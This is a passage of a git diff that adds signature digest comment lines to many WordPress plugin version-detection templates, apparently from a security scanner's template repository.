a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..c68922959f 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a661df0a3a3552b34fd4e947ce54e43eb5a4f1fd4ec97affdf7ba894679e69dd022021f8cafa80b915b41cb56b414589494ec752940df50b8b740a325e9db29b9949:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..b0f6c77cf2 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210093b12da7d556ed6d63b60ad4b364a8c412a4ccc726eb75ae9530c874a50a87bc0221009dcc62d10d070d5b4116343d0acdf74c09a1f496b9626ddbbfe11c7e31e38045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..ff25720b33 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022049f001db78abc170e62cb64811f3332f24cfe2d39c392938979e754d7a12d5b102202069b0801f78444da29872d8c47650fc1dc8f440b235e98b2483b93fd6899267:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..adf20b4657 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f371a69481a6db215e99952e9f77a2d6ae6a65e7307dc30136da4349d6a666a50220466ba71fe493efba912e584ee30fb618c1c5612b72f2fae8a50d503a70c3b596:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..daa1fb1b23 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c655351774a39087f7f8ccddf16e2a0dcc60305597568de960a9d91acc33ad0c022100be4771aee2546d029a3e6d4d335db7fce18c0e64210f298a8b41b1e4dc994303:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..cd7ae034ec 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aa4ff1cf3dd97b88b04c2ac60a4b2eb609d39e9d75ea1b171aabffa7e832ceb00220143642b4453f9a05a4b4fc89b6dfcb1047e19dee585643f02755cb8499c636f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..e8e8474ed0 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220728d3b177b10f4c5275d4584e4961f8c246b8cb3a8cfdc8da72ffd7a43f94b8c0221009b8fc8003e2cfbf4fa37b5ca4865fa511a5cf083f7bc404bd322a2a8f951c3b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..86a0addf59 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204fbc3803494e9a7b475a77a45bf7ca1c86bc2f111da9ac36079f12d06347c7810220097b6e5781450c03c2d4b189794a4ea20be6e41deb2292755072a42d8feef0b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..13dc5c164e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aae7614c855c62abcd20b4cb76677c622f5f869bfcb31fbbf81c384af662b7c0022100eeb9a61ce85f49fe4501f690bbeb24f0897bc21df473928155fcd1318aee82a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..3d1c09d150 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022043a38d16e1c77394c2fb90547b6c9d24baba7a502741d8efdd7f85bf73bcb8f2022100e979c7d4b25a1766231589c66f187281b7c7acde317ecbc36316ef1586ac9dd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..af62faa260 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206043e55f20bc894db341be3bdeb1e8cf3a4cba09addec5f5756d3a7509f2cf07022036761eacf364b0adcf7d1ed97c26c0097e95987d1ec977c800a70a254cc2d007:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..fc55edfaca 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203c51770a70ed90157dfc674724337843177faaeaf5b584357dce16e29e3ccf5e0220707d283549af78b4d82308e48db9679c6e6ce1e3ca78d03c631a59084f49572e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..7e5f1ed08d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201debc738b6fd8286d73300fd6c8bd5f536f6e110dc630b669c027c1cfb4e05170221008e5c9d44f3228fdc376fa7d20de6be84827def5b1805d0beea22432f2c02cca9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..8026f0dee7 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205a7697db072e47a90e612d2108e7f8559af5bcd2e45affe9f5e8b2ff793031bd02207b25db658c52b6482434d2744c5a748cd1cb7336f6beb81f0e5832815311eea1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..4ac875fc12 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220589039c78bdf09fa28e55a04a1015a60e90bf3b01382de6fe14691b9b70a3c97022100fa68a619a474b6b3393f947ca43f44220308bb1c85603b4c2fceb9335c90d08d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..3c0cca9684 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022053a49a60a2f77a4cf1bf8478f1a0b814bff9b04bd8f4d2a3604d135143c7ff4e02210094819abca579cdf73f82ab628c88329297039f8f9c905da21cc447d468e7fb31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..c27150055d 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220666ba5174298af93388599cb9cae4ce69f6d1dbbaa4fe92399ad074d81644cef0220501747e1baecdd60a04677fd574d5028b35862619491dbaa5f0ffdca42580c77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..3975ba0bb5 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220276f9da791fd657e6b41425e7e85a314d8c68300ed1d064ee3b7a6e04ea98b1b022100a2b1e889ec22006e9be066cf5f271f852e8d3fda65f4c2fd64dbdbce81765901:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..7f77cb3c85 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b7c6ad065b23740ba64a0e27f4b06d1c4095636df3e09b32b8215b74302bfe5c022068b22709c424db0496f13918909f30e480bc7caee123194754f9c50357553518:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..ee69769a59 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201b731cd043cb0fbcba74f205d82034dd14df5605da99b7897c67103d0e31f22a02207719e8a3bb05ac74bfe8b966882d47fb960dc37334a2bf053ac685e764f14b34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..27d63701f4 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201d8dead2bc601192c24d9c2ede3d2fb03a1c09147f07516399bf21d0e68217c1022100ccd63e6d3917a7b403782d0932bf9a41b7c8141c3a13c36e7a556a93cb7e8aac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..128303a660 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cba9149fbf638f55273fb9f438dd05d8a17a7c2e5de2a177534999b631da451a022100bb6370126efd8cb3a7de87e20ec571051502203751fdc8e7ad3161ca834683d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..a906f2d5f4 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022005d26695f69bb1ee0e50cfdc7bc87e8ac3117ccb884b91366f11c2b9746d864a02207b66a512f6b409890a65fb51acb5382a56f38f0a792f096b84dfbddb95029165:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..fbf877d69e 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202841f9f5c94621b13e202f726893c618d4e12eb138b7f718f0649db633046a18022100c6bcde153e8a781dd53cf2301d24f0c3b8471342cbca59c03a8a3b534dcaa27b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..84639211bc 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200dc6fa8d891ab7fc5a273e87862d1aee298d4f3e1ccc0a408d99a68736a65e6d02205d656cbe030bf04467dbd77ee8a8c46cf805ad31e1a4b7066f512142d413bcf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..7453312823 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c0fce00127d588c0d6a40139ecb1fb58d9ff30fbd8b86082bd13512127f050f4022100d72438a560a045d07815bdbebf43e7fe4f048dd949cf741a01d8ea676b43ce92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..1ac38312bb 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100df3c3e90dfe639337399e02b958ed2702c438ee454b69f5a12c5934194986137022100922fbebd5b6ef4b98bcb0a36065349acfa52926f759e91b666ecec7461736392:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..21aa114abd 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ce4ddbebe1ec084c1f1c337717b48e0cb1e75ebcc2102e4f51c7b70024108efd022100ff5883a5d2d37bc70eae53087a1a8f9226ef60bc32d135a046a940ac89377364:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..676360d979 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022035ed67612d0a22597366d1577577dcd21d28ad6590d311a25d45eadef5913847022039793cb9be643caa415f1371fb7155c701fa43051b7c94a4665c4ffb20b686e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..735da3fcc6 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220620ff17ebb78a0bdd73e014c65625b8a58647c16abac3af5623deb1b0f81aa01022100b45d16583f4d254a18ca04a45725b8498aee94d74b1da202e64099227d1029db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..1572325291 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201815a06a9ecbfe3a476ccd69f674149661bb561cc4d20388f21f73948ce10fad022100aaaebf8f14591460bc57ad7d040135b41c42fc64b24da30a4d7af43b02823cdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..836cbf81ed 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a914d5711e3b6b7a4106a8f55b2d8d2c44b61cbc48f957c0d67a2f9a5f31b967022019c256e4e885d35bc3383c17e22898aadcc1f78c495024825090c5a3c275cc32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..6417302e29 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022031458e4875dce1ff670f8555215d9edc4453f4d16e723d41106b5b39e3ba61ee022032c2a074a153e5b82b7f09e2281c850661e44fd43fe35ee36ea144eb7dc91a00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..75e666cfb4 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a97a8189b7dfdcd70eeae40c44df590b764be2da4e80199f2077b734a158b8bf022100907d142404dacb777c43415eeeddf4bb4abc81806125c35d2686630d96a7f91d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..8308f9b017 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bcfd909820b34100f9ad76be995fd62abb996a66f40f20ffa014765acc642945022100a9014d19b22aa91fbbc514ac79ec5a37d08213b5fb2407daffcd34a94de043d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..f5c34c4dcd 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a07090668d156385677ffeaa709ef159a082b6f05ddd1fd9416f78d1eb02bc4502201094a5153f52285d5aeb5431626abb5a33da82cc3d06c73260366aeea8005e37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..6acdd602dc 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206c296d7514ab69ac670cc628ac4ea7222c8c4061403a86711300224989a0ea1e02205029cc6b1cd0aa6247f9a71ae07d0b133b667af5c51bc063e9f7021aeef15875:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..721a88c53b 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c1e4529a1725feffd905af2f911fd5be9f8d815bbe69b3323e507efedfd44a95022100813f13b056f51d753581318a9237e675aeacc78504d5a222281dce5094b57a56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..17469b40d6 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206e80f9f8558b0c62cd4c04162986ef87f494f557f7288956ef9ee01dac9cd7c002207a96b344bf70b50cdeace736ff542994578a3aac9cc50bef5604e646463c209f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..75eee2d046 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201f1e7d7438a54f766472b1ab46e2dc0b10fd77ac53c38ccd87c70379c9ce273c022100ac6ca445014daa87fd8eff68cb610a25368ba4f6d9fc3fea12d3accd36e02667:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..a161b027e7 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200beb5029c6026fa292fdd8a095e961e0ffee6a736f7ed1718a16154d376ca85e02207395699e861b4b524ef173caf45f33c409c0b2ec6bd4f0cc03222749aa2e0ee8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..ef7cee8e34 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b569fd5968d7c58ec55582bf5741071fed2c15d48fb120dee5d19f22b4fda44702200905ba6c53301aa43d79213c71c953dd252f4253449b56759e35bd29adee0d1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..036158fc0f 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210093d2208ebe70b60b0843485df1698bf351c4d3c2302eb862040a94fe1d2d1bdf0221008dccc25d6b310755f5b921cb47128affdc329f5fde8a4623635182f6aad6b209:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..0ef7ece106 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100978d30f3ac9ef3729290619b21d04442183f1aa2d3f87b1d45f6120a12813a3802201528fb834aa70441bfbe3bc14fa9be2eba1d9bc298c8916ff7b29b4253532299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..4cd894f222 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022002786e3c15bf1859153f90a86132390694604551c4636ab83e22227e206a2f58022100f3b1d392335facf3dea583ecbaae0f22557c6a60989123c2bb4c9e3114f1cf02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..a4358d18de 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d9ad2e61df8512a23aca23b424107b56d1de025e4200f908e05bcd8beb1e5680022100f21b6a8bc7e4ff5fac1e642e28302117c0f606d26ddd6aaa5d09773f62e9edfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..757f8f9585 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f5fcc0480154083913fdbfae6e91bdd98b72a21bd5e6d4a44fb64ebdc61bbcf3022100ee1ee5ee834d2debce14924e469d24828e159e640c51f704fe0dddcbf5c5ff8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 